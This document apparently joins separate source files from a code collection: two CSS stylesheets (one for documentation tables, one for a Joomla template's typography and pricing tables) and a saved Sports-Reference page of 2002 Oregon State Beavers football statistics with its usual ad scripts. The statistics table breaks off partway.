table.element_details tr th {
color: #ffffff;
background-color: #8888dd;
border: solid 1px #8888dd;
padding: 2pt;
font-weight: bold;
text-align: left;
width: 160px;
}
table.element_details tr td {
border: solid 1px #8888dd;
padding: 2pt;
}
table.example {
border: none;
border-collapse: collapse;
table-layout: auto;
width: 95%;
}
table.example tr th {
background-color: #ddddff;
text-align: left;
border: solid 1px #8888dd;
padding: 2pt;
}
table.example tr td {
background-color: #ddddff;
text-align: left;
border: solid 1px #8888dd;
padding: 2pt;
}
table.example tr td.header {
text-align: left;
border: none;
padding: 2pt;
background-color: #ffffff;
}
.xml {
font-family: monospace;
font-size: 90%;
white-space: pre;
}
.xml .decl {
font-weight: bold;
color: #008800;
}
.xml .decl .elem .name {
font-weight: bold;
color: #008800;
}
.xml .elem .name {
font-weight: bold;
color: #000088;
}
.xml .pcdata {
font-style: italic;
}
.xml .elem .attr .name {
font-weight: normal;
color: #000088;
}
.url {
font-family: monospace;
font-size: 90%;
white-space: pre;
}
.url .functionparam .name {
color: #880000;
font-weight: bold
}
.url .functionparam .value {
color: #880000;
font-weight: bold
}
.url .param .name {
color: #000088;
font-weight: bold
}
.url .param .value {
color: #008800;
font-weight: bold
}
blockquote {
margin-top: 10pt;
margin-bottom: 10pt;
}
pre {
font-family: monospace;
font-size: 90%;
}
a:hover {
background-color: #ddddff;
text-decoration: underline;
}
a {
color: #0000bb;
text-decoration: none;
}
a:visited {
color: #0000bb;
text-decoration: none;
}
a img {
border-style: none;
}
.disabled {
color: #888888;
}
.active {
color: #888888;
font-weight: bold;
}
table.apilist {
border: none;
background-color: #ddddff;
border-collapse: collapse;
table-layout: fixed;
table-layout: auto;
width: 100%;
}
table.apilist tr th {
color: #ffffff;
background-color: #8888dd;
border: solid 1px #8888dd;
padding: 2pt;
font-weight: bold;
text-align: left;
}
table.apilist tr td {
border: solid 1px #8888dd;
padding: 2pt;
}
table.functionlist {
border: none;
background-color: #ddddff;
border-collapse: collapse;
table-layout: fixed;
table-layout: auto;
width: 100%;
}
table.functionlist tr th {
color: #ffffff;
background-color: #8888dd;
border: solid 1px #8888dd;
padding: 2pt;
font-weight: bold;
text-align: left;
}
table.functionlist tr td {
border: solid 1px #8888dd;
padding: 2pt;
}
table.typelist {
border: none;
background-color: #ddddff;
border-collapse: collapse;
table-layout: fixed;
table-layout: auto;
width: 100%;
}
table.typelist tr th {
color: #ffffff;
background-color: #8888dd;
border: solid 1px #8888dd;
padding: 2pt;
font-weight: bold;
text-align: left;
}
table.typelist tr td {
border: solid 1px #8888dd;
padding: 2pt;
}
input {
border: 1px #8888dd solid;
font-family: sans-serif;
font-size: 9pt;
background-color: #ffffff;
}
input.required {
border: 2px #8888dd solid;
}
input[name='submit'] {
margin-top: 5px;
text-align: center;
font-weight: bold;
cursor: hand;
background-color: #eeeeff;
}
select {
border: 1px #8888dd solid;
font-family: sans-serif;
font-size: 9pt;
background-color: #ffffff;
}
select.required {
border: 2px #8888dd solid;
}
td.status {
font-variant: small-caps;
}
.broken_freeze {
color: #ff4444;
font-weight: bold;
}
div.broken_freeze {
border: dashed 1px #ff4444;
margin-top: 1em;
margin-bottom: 1.5em;
padding: 1em;
}
dt {
font-weight: bold;
}
dd {
font-weight: normal;
}
lh {
text-decoration: underline;
}
|
templates/business_pro/css/editor.css | Galene/template | /* TYPOGRAPHY
----------------------------------------------------------- */
p {
padding:5px;
padding-left:0px;
padding-right:0px;
}
.module_round_box_outer ul, .moduletable ul {
list-style: none; }
.contentpaneopen ul {
list-style:disc;
margin-left:10px;
margin-right:10px;
}
ol {
margin-top: 5px;
margin-bottom: 5px; }
ol li {
padding:2px;
margin-right:15px;
margin-left: 15px; }
blockquote {
background:transparent url(../images/typography/s5_left_quote.png) no-repeat top left;
font-weight:bold;
font-style:italic;
line-height:150%;
margin:15px 0pt;
padding:0px 0px 5px 65px;
width:auto;
}
blockquote p {
background:transparent url(../images/typography/s5_right_quote.png) no-repeat bottom right;
margin-top:0pt;
padding:0pt 65px 10px 0pt;
}
.code {
background:#EBEAEA;
border-left:solid 5px #666666;
color:#666666;
font-family:monospace;
font-style:normal;
font-variant:normal;
font-weight:normal;
line-height:1.5;
margin-top:15px;
margin-bottom:15px;
padding:10px 20px;
padding-top:20px;
padding-bottom:20px;
font-size:1.4em;
}
ul.ul_arrow li {
background:transparent url(../images/typography/s5_ul_arrow.png) no-repeat top left;
padding:3px;
padding-left:18px;
padding-right:18px;
list-style:none;
}
#s5_component_wrap ul.ul_arrow {
padding-left:0px;
margin-left:0px;
margin-right:0px;
list-style-type:none;}
ul.ul_star li {
background:transparent url(../images/typography/s5_ul_star.png) no-repeat top left;
line-height: 17px;
list-style: none outside none;
margin-top: 12px;
padding: 0 16px 0 24px;
}
#s5_component_wrap ul.ul_star {
line-height: 21px;
list-style-type: none;
margin-left: 0;
margin-right: 0;
padding-left: 0;}
ul.ul_bullet li {
background:transparent url(../images/typography/s5_ul_bullet.png) no-repeat top left;
padding:3px;
padding-left:23px;
padding-right:18px;
list-style:none;
}
#s5_component_wrap ul.ul_bullet {
padding-left:0px;
margin-left:0px;
margin-right:0px;
list-style-type:none;}
#s5_component_wrap ul.ul_numbers {
padding-left:0px;
margin-left:0px;
margin-right:0px;
list-style-type:none;}
ul.ul_numbers li {
padding-top:6px;
padding-left:36px;}
li.li_number1 {
background:transparent url(../images/typography/s5_li_number1.png) no-repeat top left;
padding-top:8px;
padding-bottom:22px;
list-style-type:none;
padding-right:18px;
padding-left:40px;
}
li.li_number2 {
background:transparent url(../images/typography/s5_li_number2.png) no-repeat top left;
padding-top:8px;
padding-bottom:22px;
list-style-type:none;
padding-right:18px;
padding-left:40px;
}
li.li_number3 {
background:transparent url(../images/typography/s5_li_number3.png) no-repeat top left;
padding-top:8px;
padding-bottom:22px;
list-style-type:none;
padding-right:18px;
padding-left:40px;
}
li.li_number4 {
background:transparent url(../images/typography/s5_li_number4.png) no-repeat top left;
padding-top:8px;
padding-bottom:22px;
list-style-type:none;
padding-right:18px;
padding-left:40px;
}
li.li_number5 {
background:transparent url(../images/typography/s5_li_number5.png) no-repeat top left;
padding-top:8px;
padding-bottom:22px;
list-style-type:none;
padding-right:18px;
padding-left:40px;
}
li.li_number6 {
background:transparent url(../images/typography/s5_li_number6.png) no-repeat top left;
padding-top:8px;
padding-bottom:22px;
list-style-type:none;
padding-right:18px;
padding-left:40px;
}
li.li_number7 {
background:transparent url(../images/typography/s5_li_number7.png) no-repeat top left;
padding-top:8px;
padding-bottom:22px;
list-style-type:none;
padding-right:18px;
padding-left:40px;
}
li.li_number8 {
background:transparent url(../images/typography/s5_li_number8.png) no-repeat top left;
padding-top:8px;
padding-bottom:22px;
list-style-type:none;
padding-right:18px;
padding-left:40px;
}
li.li_number9 {
background:transparent url(../images/typography/s5_li_number9.png) no-repeat top left;
padding-top:8px;
padding-bottom:22px;
list-style-type:none;
padding-right:18px;
padding-left:40px;
}
.red_box {
background:#FFD6D6;
border:solid 1px #EF706F;
color:#CC0000;
padding:6px 6px 6px 15px;
}
.red_box a, #s5_component_wrap_inner .red_box a {
color:#CC0000;
font-weight:bold;
text-decoration:underline;
}
.blue_box {
background:#D0DCEC;
border:solid 1px #5B95DA;
color:#1B6FC2;
padding:6px 6px 6px 15px;
}
.blue_box a, #s5_component_wrap_inner .blue_box a {
color:#1B6FC2;
font-weight:bold;
text-decoration:none;
}
.green_box {
background:#EEF7DD;
border:solid 1px #40AB38;
color:#40AB38;
padding:6px 6px 6px 15px;
}
.green_box a, #s5_component_wrap_inner .green_box a {
color:#40AB38;
font-weight:bold;
text-decoration:underline;
}
.orange_box {
background:#FEF6D8;
border:solid 1px #755102;
color:#755102;
padding:6px 6px 6px 15px;
}
.orange_box a, #s5_component_wrap_inner .orange_box a {
color:#755102;
font-weight:bold;
text-decoration:underline;
}
.yellow_box {
background:#F4F5B9;
border:solid 1px #757402;
color:#757402;
padding:6px 6px 6px 15px;
}
.yellow_box a, #s5_component_wrap_inner .yellow_box a {
color:#757402;
font-weight:bold;
text-decoration:underline;
}
.gray_box {
background:#FFFFFF;
border:solid 1px #9D9D9D;
color:#4B4B4B;
padding:6px 6px 6px 15px;
}
.gray_box a, #s5_component_wrap_inner .gray_box a {
color:#4B4B4B;
font-weight:bold;
text-decoration:underline;
}
.black_box {
background:#333333;
border:solid 1px #4D4D4D;
color:#FFFFFF;
padding:6px 6px 6px 15px;
}
.black_box a, #s5_component_wrap_inner .black_box a {
color:#FFFFFF;
font-weight:bold;
text-decoration:underline;
}
.boxed {
background: none repeat scroll 0 0 #D9D9D9;
border: 1px solid #BFBEBE;
margin-right: 0;
padding: 5px;
float:left;
margin:0px;
margin-bottom:14px;
}
.boxed_black {
background:#1A1A1A;
padding:3px;
margin-right:10px;
margin-bottom:8px;
-webkit-transition: background 200ms ease-out;
-moz-transition: background 200ms ease-out;
-o-transition: background 200ms ease-out;
transition: background 200ms ease-out;
}
.boxed_black:hover {
background:#414141;
-webkit-transition: background 200ms ease-in;
-moz-transition: background 200ms ease-in;
-o-transition: background 200ms ease-in;
transition: background 200ms ease-in;
}
.padded, .img-intro-right img, .img-intro-left img, .img-fulltext-right img, .img-fulltext-left img {
float:left;
padding:10px;
margin-right:18px;
margin-bottom:18px;
background:#FFFFFF;
border:solid 1px #D8D7D7;
}
.img-intro-right img, .img-fulltext-right img {
float:right;
}
#s5_component_wrap .padded {
float:none;
margin:0px;
margin-bottom:14px;
}
.img-intro-right, .img-fulltext-right {
margin-left:18px;
}
.img-intro-left, .img-fulltext-left {
margin-right:18px;
}
.black_bg {
background:#2E2E2E;
color:#FFFFFF !important;
padding:12px;
padding-bottom:15px;
padding-top:20px;
font-size:2.8em !important;
display:inline;
}
.s5_greenbox {
position:relative;
padding:12px;
-moz-box-shadow: 0 0px 3px rgba(0, 0, 0, 0.3) inset; /* FF3.5+ */
-webkit-box-shadow: 0 0px 3px rgba(0, 0, 0, 0.3) inset; /* Saf3.0+, Chrome */
box-shadow: 0 0px 3px rgba(0, 0, 0, 0.3) inset; /* Opera 10.5, IE9, Chrome 10+ */
color:#ffffff;
background:#185564;}
.s5_greenbox a {color:#ffffff;}
.s5_greenbox .point {
padding-left:42px;
background:transparent url(../images/typography/s5_alert.png) no-repeat center left;}
.s5_graybox {
position:relative;
padding:12px;
color:#313131;
-moz-box-shadow: 0 0px 3px rgba(0, 0, 0, 0.3) inset; /* FF3.5+ */
-webkit-box-shadow: 0 0px 3px rgba(0, 0, 0, 0.3) inset; /* Saf3.0+, Chrome */
box-shadow: 0 0px 3px rgba(0, 0, 0, 0.3) inset; /* Opera 10.5, IE9, Chrome 10+ */
background:#e6e6e6;}
.s5_graybox a {color:#313131;}
.s5_graybox .point {
padding-left:42px;
background:transparent url(../images/typography/s5_alert.png) no-repeat center left;}
.s5_bluebox {
position:relative;
padding:12px;
-moz-box-shadow: 0 0px 3px rgba(0, 0, 0, 0.3) inset; /* FF3.5+ */
-webkit-box-shadow: 0 0px 3px rgba(0, 0, 0, 0.3) inset; /* Saf3.0+, Chrome */
box-shadow: 0 0px 3px rgba(0, 0, 0, 0.3) inset; /* Opera 10.5, IE9, Chrome 10+ */
color:#ffffff;
background:#22ace5;}
.s5_bluebox a {color:#ffffff;}
.s5_bluebox .point {
padding-left:42px;
background:transparent url(../images/typography/s5_alert.png) no-repeat center left;}
.s5_redbox {
position:relative;
padding:12px;
-moz-box-shadow: 0 0px 3px rgba(0, 0, 0, 0.3) inset; /* FF3.5+ */
-webkit-box-shadow: 0 0px 3px rgba(0, 0, 0, 0.3) inset; /* Saf3.0+, Chrome */
box-shadow: 0 0px 3px rgba(0, 0, 0, 0.3) inset; /* Opera 10.5, IE9, Chrome 10+ */
color:#ffffff;
background:#ff5858;}
.s5_bluebox a {color:#ffffff;}
.s5_redbox .point {
padding-left:42px;
background:transparent url(../images/typography/s5_alert.png) no-repeat center left;}
#contact-form .button {
margin-top:14px;
margin-bottom:14px;
}
/* PRICING TABLE
----------------------------------------------------------- */
.s5_pricetable_7, .s5_pricetable_6, .s5_pricetable_5, .s5_pricetable_4, .s5_pricetable_3, .s5_pricetable_2, .s5_pricetable_1 {padding-top:50px;}
.s5_pricetable_7, .s5_pricetable_6, .s5_pricetable_5, .s5_pricetable_4, .s5_pricetable_3, .s5_pricetable_2, .s5_pricetable_1 {padding-bottom:25px;}
.s5_pricetable_7 .s5_pricetable_column { width:13.5%;}
.s5_pricetable_6 .s5_pricetable_column { width:15.5%;}
.s5_pricetable_5 .s5_pricetable_column { width:19.5%;}
.s5_pricetable_4 .s5_pricetable_column { width:24.5%;}
.s5_pricetable_3 .s5_pricetable_column { width:32.5%;}
.s5_pricetable_2 .s5_pricetable_column { width:49.5%;}
.s5_pricetable_1 .s5_pricetable_column { width:100%;}
.s5_pricetable_column.recommended {
margin-top: -22px;
padding-bottom: 23px;
background:#333333;
color:#ffffff;
position: relative;
margin-left: -1px;
margin-right: -1px;
border: medium none;}
.s5_pricetable_column {
border:1px solid #cccccc;
text-align:center;
padding-bottom: 10px;
background:#ffffff;
float:left;}
.s5_pricetable_column_padding {
padding:20px;}
.s5_pricetable_column .s5_title {
font-size: 2.2em;
margin-bottom: 40px;
padding: 17px 14px;
color:#ffffff;
background:#333333;}
.s5_pricetable_column.recommended .s5_title {
color:#000000;
background:#ffffff;}
.s5_pricetable_column .s5_horizontalrule {
height:1px;
margin-bottom: 26px;
background:#e1e1e1;}
.s5_pricetable_column .s5_options {
font-size: 1.1em;
margin-bottom: 25px;
line-height: 32px;
margin-top: 25px;
text-align: center;}
.s5_pricetable_column a.s5_pricetable {
text-decoration:none;
text-align:center;}
.s5_buttoncenter {
text-align:center;}
.s5_pricetable_column .price {
line-height: 42px;
font-size:5.1em;}
.s5_pricetable_column .dollarsign {
font-size: 1.4em;
vertical-align: top;}
.s5_pricetable_column .month{
vertical-align: text-top;
font-size: 1.1em;}
@media screen and (max-width: 970px){
.s5_pricetable_column {
margin-bottom:45px;
float:none;}
.s5_pricetable_column.recommended {
margin-top:0px;}
.s5_pricetable_7 .s5_pricetable_column { width:100%;}
.s5_pricetable_6 .s5_pricetable_column { width:100%;}
.s5_pricetable_5 .s5_pricetable_column { width:100%;}
.s5_pricetable_4 .s5_pricetable_column { width:100%;}
.s5_pricetable_3 .s5_pricetable_column { width:100%;}
.s5_pricetable_2 .s5_pricetable_column { width:100%;}
} |
source_data/2002/stats/Oregon State.html | vrivellino/cfs | <!DOCTYPE html>
<html itemscope itemtype="http://schema.org/website" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/" lang="en">
<head>
<title>2002 Oregon State Beavers Statistics | College Football at Sports-Reference.com</title>
<script type="text/javascript">var sr_gzipEnabled = false;</script>
<script type="text/javascript" src="http://d2ft4b0ve1aur1.cloudfront.net/js-250/sr.gzipcheck.js.jgz"></script>
<noscript>
<link type="text/css" rel="stylesheet" href="http://d2ft4b0ve1aur1.cloudfront.net/css-250/sr-cfb-min.css">
</noscript>
<script type="text/javascript">
(function () {
var sr_css_file = 'http://d2ft4b0ve1aur1.cloudfront.net/css-250/sr-cfb-min.css';
if (sr_gzipEnabled) {
sr_css_file = 'http://d2ft4b0ve1aur1.cloudfront.net/css-250/sr-cfb-min-gz.css';
}
var head = document.getElementsByTagName("head")[0];
if (head) {
var scriptStyles = document.createElement("link");
scriptStyles.rel = "stylesheet";
scriptStyles.type = "text/css";
scriptStyles.href = sr_css_file;
head.appendChild(scriptStyles);
//alert('adding css to header:'+sr_css_file);
}
}());
</script>
<meta charset="utf-8">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="keywords" content="college, ncaa, football, stats, statistics, history, Oregon State Beavers, 2002, stats">
<meta property="fb:admins" content="34208645" />
<meta property="fb:page_id" content="185855008121268" />
<meta property="og:site_name" content="College Football at Sports-Football-Reference.com">
<meta property="og:image" content="http://d2ft4b0ve1aur1.cloudfront.net/images-250/SR-College-Football.png">
<meta itemprop="image" content="http://d2ft4b0ve1aur1.cloudfront.net/images-250/SR-College-Football.png">
<meta property="og:description" content="Statistics, Game Logs, Splits, and much more">
<meta property="og:title" content="2002 Oregon State Beavers">
<meta property="og:url" content="http://www.sports-reference.com/cfb/schools/oregon-state/2002.html">
<meta property="og:type" content="team">
<link rel="canonical" href="http://www.sports-reference.com/cfb/schools/oregon-state/2002.html"/>
<meta itemprop="name" content="2002 Oregon State Beavers">
<meta itemprop="description" content="Statistics, Game Logs, Splits, and much more">
<div></div><!-- to prevent hangs on some browsers -->
<link rel="icon" type="image/vnd.microsoft.icon" href="http://d2ft4b0ve1aur1.cloudfront.net/images-250/favicon-cfb.ico">
<link rel="shortcut icon" type="image/vnd.microsoft.icon" href="http://d2ft4b0ve1aur1.cloudfront.net/images-250/favicon-cfb.ico">
<link rel="search" type="application/opensearchdescription+xml" href="http://d2ft4b0ve1aur1.cloudfront.net/os-250/opensearch-cfb.xml" title="CFB-Ref Search">
<!--[if lte IE 6]>
<style type="text/css">
.hovermenu,.hovermenu_ajax,.sub_index,#quick_index {display:none!important}
</style>
<![endif]-->
<!-- CRITEO -->
<script type="text/javascript">
var crtg_nid="1631";
var crtg_cookiename="cto_usatd";
function crtg_getCookie(c_name){var i,x,y,ARRcookies=document.cookie.split(";");for(i=0;i<ARRcookies.length;i++){x=ARRcookies[i].substr(0,ARRcookies[i].indexOf("="));y=ARRcookies[i].substr(ARRcookies[i].indexOf("=")+1);x=x.replace(/^\s+|\s+$/g,"");if(x==c_name){return unescape(y);}}return'';} var crtg_content=crtg_getCookie(crtg_cookiename);var crtg_rnd=Math.floor(Math.random()*99999999999);var crtg_url='http://rtax.criteo.com/delivery/rta/rta.js?netId='+escape(crtg_nid);crtg_url+='&cookieName='+escape(crtg_cookiename);crtg_url+='&rnd='+crtg_rnd;crtg_url+='&varName=crtg_content';var crtg_script=document.createElement('script');crtg_script.type='text/javascript';crtg_script.src=crtg_url;crtg_script.async=true;if(document.getElementsByTagName("head").length>0)document.getElementsByTagName("head")[0].appendChild(crtg_script);else if(document.getElementsByTagName("body").length>0)document.getElementsByTagName("body")[0].appendChild(crtg_script);
var crtg_ap=new Array();var crtg_cp=(crtg_content!=null&&crtg_content.length>0)?crtg_content.split(';'):null;if(crtg_cp){for(var crtg_kidx in crtg_cp){if(crtg_cp[crtg_kidx].length>0){var crtg_apa=crtg_cp[crtg_kidx].split('=');if(crtg_apa[1]==1){crtg_ap.push(crtg_apa[0].replace(/usatd/,''))}}}}
</script>
<!-- SYNCHRONOUS:googletag -->
<script type="text/deferscript">
(function() {
var useSSL = 'https:' == document.location.protocol;
var src = (useSSL ? 'https:' : 'http:') + '//www.googletagservices.com/tag/js/gpt.js';
document.write('<scr' + 'ipt src="' + src + '"></scr' + 'ipt>');
})();
</script>
<script type="text/deferscript">
googletag.pubads().enableSyncRendering();
googletag.pubads().setTargeting("usatcriteo",crtg_ap);
</script>
</head>
<body onload="" >
<div id="page_container">
<div id="top_nav">
<div id="site_header">
<div id="sr_header">
<div class="float_right">
<a href="http://www.sports-reference.com">S-R</a>:
<a href="http://www.baseball-reference.com">MLB</a> |
<a href="http://www.basketball-reference.com/">NBA</a> ·
<a href="http://www.sports-reference.com/cbb/">CBB</a> |
<a href="http://www.pro-football-reference.com">NFL</a> ·
<span class="bold_text">CFB</span> |
<a href="http://www.hockey-reference.com">NHL</a> |
<a href="http://www.sports-reference.com/olympics/">Oly</a> |
<a href="http://www.sports-reference.com/blog/">Blog</a>
</div>
<div class="clear_both clearfix float_right margin_left padding_top_half">
<a class="sprite-twitter" title="Follow us on Twitter" href="http://twitter.com/sports_ref"></a> <a class="sprite-facebook" title="Become a Fan on Facebook" href="http://www.facebook.com/SR.CollegeFootball"></a>
</div>
<div class="float_right">
<form method="get" id="f" name="f" action="/cfb/search.cgi">
<input x-webkit-speech type="search" placeholder="" id="search" name="search" class="search long">
<input type="submit" value="Search" class="submit">
</form>
</div>
</div>
<div class="float_left padding_bottom_half">
<a href="/cfb/"><img src="http://d2ft4b0ve1aur1.cloudfront.net/images-250/SR-College-Football.png" width="464" height="49" class="border0" alt="College Football Statistics & History | College Football at Sports-Reference.com"></a>
</div>
</div>
<div id="quick_index">
<ul class="hovermenu_ajax navbar">
<li class=""><a href="/cfb/play-index/">play index</a><ul class="li_margin" id="header_playindex"></ul></li>
<li class=""><a href="/cfb/boxscores/">box scores</a><ul class="li_margin" id="header_boxscores"></ul></li>
<li class=""><a href="/cfb/players/">players</a><ul class="li_margin" id="header_players"></ul></li>
<li class="active"><a href="/cfb/schools/">schools</a><ul class="li_margin" id="header_schools"></ul></li>
<li class=""><a href="/cfb/years/">seasons</a><ul class="li_margin" id="header_years"></ul></li>
<li class=""><a href="/cfb/conferences/">conferences</a><ul class="li_margin" id="header_conferences"></ul></li>
<li class=""><a href="/cfb/coaches/">coaches</a><ul class="li_margin" id="header_coaches"></ul></li>
<li class=""><a href="/cfb/leaders/">leaders</a><ul class="li_margin" id="header_leaders"></ul></li>
<li class=""><a href="/cfb/awards/">awards</a><ul class="li_margin" id="header_awards"></ul></li>
<li class=""><a href="/cfb/bowls/">bowls</a><ul class="li_margin" id="header_bowls"></ul></li>
<li class=""><a href="">more [+]</a>
<ul class="li_margin" id="header_more_links">
<li>
<a class="bold_text" href="/cfb/about/">About</a>:
<a href="/cfb/about/what-is-major.html">What is Major?</a>,
<a href="/cfb/about/glossary.html#srs">Simple Rating System</a>,
<a href="/cfb/about/glossary.html">Glossary</a>,
<a href="/cfb/about/sources.html">Sources</a>,
<a href="/cfb/about/contact.html">Contacts</a>,
<a href="/cfb/about/philosophy.html">Philosophy</a>
</li>
<li><a class="bold_text" href="http://www.sports-reference.com/blog/category/cfb-at-sports-reference/">Blog</a>: News and notes about CFB at Sports-Reference.com</li>
<li>
<a class="bold_text" href="/cfb/friv/">Frivolities</a>:
<a href="/cfb/friv/elo.cgi">Elo School Rater</a>
</li>
</ul>
</li>
</ul>
</div>
<div id="you_are_here">
<p><strong>You Are Here</strong> > <a href="/cfb/">SR/CFB</a> > <a href="/cfb/schools/">Schools</a> > <a href="/cfb/schools/oregon-state/">Oregon State Beavers</a> > <strong>2002</strong></p>
</div>
<div class="site_news"><p><span class="bold_text">News:</span> <span class="poptip" tip="Just a friendly reminder to check out our Olympics site, which is being updated daily throughout the London games.">s-r blog:<a onClick="try { pageTracker._trackEvent('blog','click','area-yah'); } catch (err) {};"
href="http://www.sports-reference.com/blog/2012/07/olympics-at-sports-reference/">Olympics at Sports-Reference</a> <span class="small_text"></span></span></p></div>
</div>
<div id="restofsite_launchpad" class="advertlaunchpad">
<script type='text/deferscript'>
googletag.defineSlot('/7103/SMG_CollegeFootballReference/launchpad/Sports/NCAA/Football.general', [970,66] , 'restofsite_launchpad').addService(googletag.pubads());
googletag.enableServices();
googletag.display("restofsite_launchpad");
</script>
</div><!-- div.#restofsite_launchpad.advertlaunchpad -->
<div id="info_box">
<div id="restofsite_300x250_atf1" class="advert300x250">
<script type='text/deferscript'>
googletag.defineSlot('/7103/SMG_CollegeFootballReference/300x250_1a/Sports/NCAA/Football.general', [[300,250],[300,600]] , 'restofsite_300x250_atf1').addService(googletag.pubads());
googletag.enableServices();
googletag.display("restofsite_300x250_atf1");
</script>
</div><!-- div.#restofsite_300x250_atf1.advert300x250 -->
<h1>2002 Oregon State Beavers Statistics</h1>
<div class="social_media">
<div class="float_left"><span id="fb-root"></span><fb:like width="200" show_faces="0" height="35" ref="team_like"></fb:like></div>
<div class="float_left"><div class="g-plusone" data-size="medium" data-annotation="inline" data-width="150"></div></div>
</div>
<p><a href="/cfb/schools/oregon-state/">School Index:</a> <a href="/cfb/schools/oregon-state/2001.html">Previous Year</a> ▪ <a href="/cfb/schools/oregon-state/2003.html">Next Year</a></p>
<form class="sr_standard inline" name="pages" action="">
<strong>Navigation:</strong>
<select name="cfb_pages" onchange="sr_goto_page('cfb_pages','',this.form);">
<option value="" disabled >Select Page
<option value="/cfb/schools/oregon-state/2002.html" selected>Statistics
<option value="/cfb/schools/oregon-state/2002-schedule.html">Schedule and Results
<option value="/cfb/schools/oregon-state/2002-roster.html">Roster
<option value="/cfb/schools/oregon-state/2002/gamelog/">Game Log
<option value="/cfb/schools/oregon-state/2002/splits/">Splits
</select>
</form>
<p class="margin_top"><strong>Conference:</strong> <a href="/cfb/conferences/pac-10/2002.html">Pac-10</a>
<br><strong>Record:</strong> 8-5, .615 W-L% (36th of 117) (<a href="/cfb/schools/oregon-state/2002-schedule.html">Schedule and Results</a>)
<br><strong>Coach:</strong> <a href="/cfb/coaches/dennis-erickson-1.html">Dennis Erickson</a> (8-5)
<p><strong>PTS/G:</strong> 31.8 (26th of 117) ▪ <strong>Opp PTS/G:</strong> 20.5 (27th of 117)
<br><strong><a href="/cfb/about/glossary.html#srs" onmouseover="Tip('Simple Rating System; a rating that takes into account average point differential and strength of schedule. The rating is denominated in points above/below average, where zero is average.')">SRS</a>:</strong> 9.45 (25th of 117) ▪ <strong><a href="/cfb/about/glossary.html#sos" onmouseover="Tip('Strength of Schedule; a rating of strength of schedule. The rating is denominated in points above/below average, where zero is average.')">SOS</a>:</strong> 3.35 (42nd of 117)
<p><strong>Bowl Game:</strong> Lost <a href="/cfb/bowls/buffalo-wild-wings-bowl.html">Insight Bowl</a> 38-13 versus <a href="/cfb/schools/pittsburgh/2002.html">Pittsburgh</a></div>
<div id="restofsite_728x90_atf1" class="advert728x90">
<script type='text/deferscript'>
googletag.defineSlot('/7103/SMG_CollegeFootballReference/728x90_1a/Sports/NCAA/Football.general', [728,90] , 'restofsite_728x90_atf1').addService(googletag.pubads());
googletag.enableServices();
googletag.display("restofsite_728x90_atf1");
</script>
</div><!-- div.#restofsite_728x90_atf1.advert728x90 -->
<div id="page_content">
<div class="table_heading">
<h2 style="">Team Statistics</h2>
<div class="table_heading_text">Most values are per game averages</div>
</div>
<div class="table_container" id="div_team">
<table class=" show_controls stats_table" id="team">
<colgroup><col><col><col><col><col><col><col><col><col><col><col><col><col><col><col><col><col><col><col><col><col><col><col></colgroup>
<thead>
<tr class=" over_header">
<th></th>
<th></th>
<th align="center" colspan=5 class="bold_text over_header" >Passing</th>
<th align="center" colspan=4 class="bold_text over_header" >Rushing</th>
<th align="center" colspan=3 class="bold_text over_header" >Total Offense</th>
<th align="center" colspan=4 class="bold_text over_header" >First Downs</th>
<th align="center" colspan=2 class="bold_text over_header" >Penalties</th>
<th align="center" colspan=3 class="bold_text over_header" >Turnovers</th>
</tr>
<tr class="">
<th align="left" class=" sort_default_asc" >Split</th>
<th align="right" class="" tip="Games">G</th>
<th align="right" class="" tip="Pass Completions">Cmp</th>
<th align="right" class="" tip="Pass Attempts">Att</th>
<th align="right" class="" tip="Pass Completion Percentage">Pct</th>
<th align="right" class="" tip="Passing Yards">Yds</th>
<th align="right" class="" tip="Passing Touchdowns">TD</th>
<th align="right" class="" tip="Rush Attempts">Att</th>
<th align="right" class="" tip="Rushing Yards">Yds</th>
<th align="right" class="" tip="Rushing Yards Per Attempt">Avg</th>
<th align="right" class="" tip="Rushing Touchdowns">TD</th>
<th align="right" class="" tip="Plays (Pass Attempts plus Rush Attempts)">Plays</th>
<th align="right" class="" tip="Total Yards (Passing Yards plus Rushing Yards)">Yds</th>
<th align="right" class="" tip="Total Yards Per Play">Avg</th>
<th align="right" class="" tip="First Downs by Pass">Pass</th>
<th align="right" class="" tip="First Downs by Rush">Rush</th>
<th align="right" class="" tip="First Downs by Penalty">Pen</th>
<th align="right" class="" tip="First Downs">Tot</th>
<th align="right" class="" tip="Penalties">No.</th>
<th align="right" class="" tip="Penalty Yards">Yds</th>
<th align="right" class="" tip="Fumbles Lost">Fum</th>
<th align="right" class="" tip="Passing Interceptions">Int</th>
<th align="right" class="" tip="Turnovers">Tot</th>
</tr>
</thead>
<tbody>
<tr class="">
<td align="left" >Offense</td>
<td align="right" >13</td>
<td align="right" >17.0</td>
<td align="right" >36.0</td>
<td align="right" >47.2</td>
<td align="right" >262.6</td>
<td align="right" >2.0</td>
<td align="right" >38.6</td>
<td align="right" >148.7</td>
<td align="right" >3.9</td>
<td align="right" >1.6</td>
<td align="right" >74.6</td>
<td align="right" >411.3</td>
<td align="right" >5.5</td>
<td align="right" >11.2</td>
<td align="right" >7.5</td>
<td align="right" >1.7</td>
<td align="right" >20.4</td>
<td align="right" >9.7</td>
<td align="right" >100.2</td>
<td align="right" >0.8</td>
<td align="right" >1.1</td>
<td align="right" >1.9</td>
</tr>
<tr class="">
<td align="left" >Defense</td>
<td align="right" >13</td>
<td align="right" >17.1</td>
<td align="right" >35.1</td>
<td align="right" >48.7</td>
<td align="right" >199.3</td>
<td align="right" >0.8</td>
<td align="right" >36.8</td>
<td align="right" >94.2</td>
<td align="right" >2.6</td>
<td align="right" >1.0</td>
<td align="right" >71.9</td>
<td align="right" >293.5</td>
<td align="right" >4.1</td>
<td align="right" >8.7</td>
<td align="right" >5.5</td>
<td align="right" >3.8</td>
<td align="right" >18.0</td>
<td align="right" >7.7</td>
<td align="right" >63.3</td>
<td align="right" >1.0</td>
<td align="right" >1.5</td>
<td align="right" >2.5</td>
</tr>
<tr class="">
<td align="left" >Difference</td>
<td align="right" ></td>
<td align="right" >-0.1</td>
<td align="right" >+0.9</td>
<td align="right" >-1.5</td>
<td align="right" >+63.3</td>
<td align="right" >+1.2</td>
<td align="right" >+1.8</td>
<td align="right" >+54.5</td>
<td align="right" >+1.3</td>
<td align="right" >+0.6</td>
<td align="right" >+2.7</td>
<td align="right" >+117.8</td>
<td align="right" >+1.4</td>
<td align="right" >+2.5</td>
<td align="right" >+2.0</td>
<td align="right" >-2.1</td>
<td align="right" >+2.4</td>
<td align="right" >+2.0</td>
